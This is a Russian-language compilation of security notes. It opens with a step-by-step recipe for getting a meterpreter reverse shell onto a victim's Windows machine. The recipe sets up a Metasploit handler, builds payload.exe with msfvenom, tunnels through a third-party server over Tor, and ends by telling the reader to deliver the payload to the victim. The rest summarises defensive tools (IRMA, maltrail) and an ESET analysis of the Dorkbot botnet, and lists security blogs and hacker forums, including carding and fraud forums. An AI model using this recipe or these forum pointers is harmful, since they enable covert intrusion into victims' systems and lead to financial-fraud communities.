meterpreter/reverse_tcp через промежуточный сервер с помощью SSH-туннелей

Используем левый сервер в качестве прокси, к которому будет цепляться meterpreter жертвы с помощью reverse tcp.
Запускаем handler в metasploit'e с метерпритером в качестве нагрузки и указываем адрес левого сервера:

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp 

set LHOST KALI_ETH0_IP 

set LPORT LPORT

В настройках sshd левого сервера указываем GatewayPorts yes. Через proxychains4, настроенный на тор, сначала пробрасываем себе ssh:

proxychains4 ssh -v -N -L 42022:127.0.0.1:22 USER@LEFT_SERVER_IP


Затем пробрасываем себе порт, на который будет цепляться meterpreter:

ssh -v -N -R LPORT:KALI_ETH0_IP:LPORT user@127.0.0.1 -p 42002


Генерируем exe с meterpreter/reverse_tcp в качестве нагрузки:

msfvenom -a x86 --platform Windows -f exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=22222 > payload.exe


Доставляем payload.exe жертве, запускаем, радуемся.

IRMA [malware scan]

http://irma.quarkslab.com/install.html

IRMA is an asynchronous and customizable analysis platform for suspicious files!

maltrail [malicious traffic detection system]

https://github.com/stamparm/maltrail

Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name (e.g. zvpprsensinaix.com for Banjori malware), URL (e.g. http://109.162.38.120/harsh02.exefor known malicious executable) or IP address (e.g. 103.224.167.117 for known attacker). Also, it has (optional) advanced heuristic mechanisms that can help in discovery of unknown threats (e.g. new malware).

Ботнет Dorkbot [eset]

На диаграмме ниже показаны различные компоненты, которые используются в последних версиях Dorkbot, нам удалось их проанализировать.

Рассмотрим типичный процесс заражения вредоносной программой через съемный USB-накопитель, который поможет лучше проиллюстрировать роль каждого модуля. Так как Dorkbot выполняет поиск подключенных к зараженной системе съемных носителей для их последующей компрометации, многие из наших обнаружений образцов этой вредоносной программы срабатывали именно на съемных носителях. При этом на них было обнаружено два типа файлов Dorkbot: исполняемый файл дроппера и .LNK-файлы с фишинговыми названиями, которые указывают на файл дроппера.

При запуске пользователем дроппера Dorkbot с USB-носителя (обнаруживается AV-продуктами ESET как Win32/Dorkbot.I), он пытается загрузить с удаленного сервера основной компонент вредоносной программы. Адрес самого сервера жестко зашит в исполняемом файле дроппера. Загруженный файл сильно упакован, а его код извлекает из себя и исполняет исполняемый файл Win32/Dorkbot.L, который представляет из себя простую обертку (wrapper), используемую для установки основного компонента. Этот основной компонент обнаруживается нами как Win32/Dorkbot.B и отвечает за работу с удаленным сервером по IRC. Обертка также специализируется на перехвате API-функции DnsQuery у основного компонента. Такой метод используется Dorkbot для усложнения обнаружения доменов настоящих C&C-серверов антивирусными аналитиками, поскольку в таком случае у запускаемого компонента отсутствуют адреса настоящих C&C-серверов злоумышленников. Когда он попытается выполнить трансляцию доменов через DnsQuery, вызов функции будет перехвачен и в качестве одного из аргументов обертка передаст API-функции адрес настоящего C&C-сервера.

После завершения установки вредоносной программы, бот будет пытаться подключиться к IRC-серверу и будет ожидать поступления определенных команд по фиксированному каналу от злоумышленников. Как правило, бот получает команды на загрузку и исполнение в системе новых вредоносных программ, которые были указаны выше.

Ботнет на основе Dorkbot активен уже давно и злоумышленники успешно используют его по сей день. Инфраструктура управляющих C&C-серверов этого ботнета является одной из тех, деятельность которой отслеживают специалисты компании ESET. Такая информация очень важна для отслеживания изменений в поведении вредоносной программы, а также для накапливания информации о ней, с целью ее использования правоохранительными органами.

Вредоносная программа Dorkbot не использует каких-либо новых методов для компрометации новых систем. Пользователи должны быть осторожны при открытии файлов на сменных носителях, а также тех файлов, которые они получают через электронную почту и социальные сети. Для проверки своей системы на заражение Dorkbot, можно воспользоваться нашим бесплатным инструментом отсюда. На сегодняшний день антивирусные продукты ESET тысячи различных модификаций файлов Dorkbot, а также файлов вредоносных программ, которые распространяются этим ботнетом.

Ниже приведены примеры URL-адресов или их составляющих, на срабатывание которых нацелен компонент похитителя паролей Dorkbot.

Security blog`s list [блоги по ИБ]

Список блогов, посвящённых информационной безопасности. Знаете (ведёте) тематический блог на русском (желательно) языке, отсутствующий здесь? Сообщите, и он обязательно будет включён в данный список.

http://zlonov.ru/blogs/

Hack[ers] Forums list

Адрес	Краткое описание	Тип регистрации
http://bhf.su/	Best Hack Forum, программирование и хакерский софт	Открытая
http://brutezone.ru/	BruteZone - форум об информационной безопасности	Открытая
http://bugtraq.ru/forum/	Общетематический форум портала BugTraq, посвящённый ИБ	Открытая
http://carderland.com/	Форум кардеров которые интересуются оборудованием для кардинга, обналом, пластиком и дампами.	Открытая
http://ccc.gs	Форум школьников, изначально сделанный для кидков и мошенничества, есть статьи по кардерству.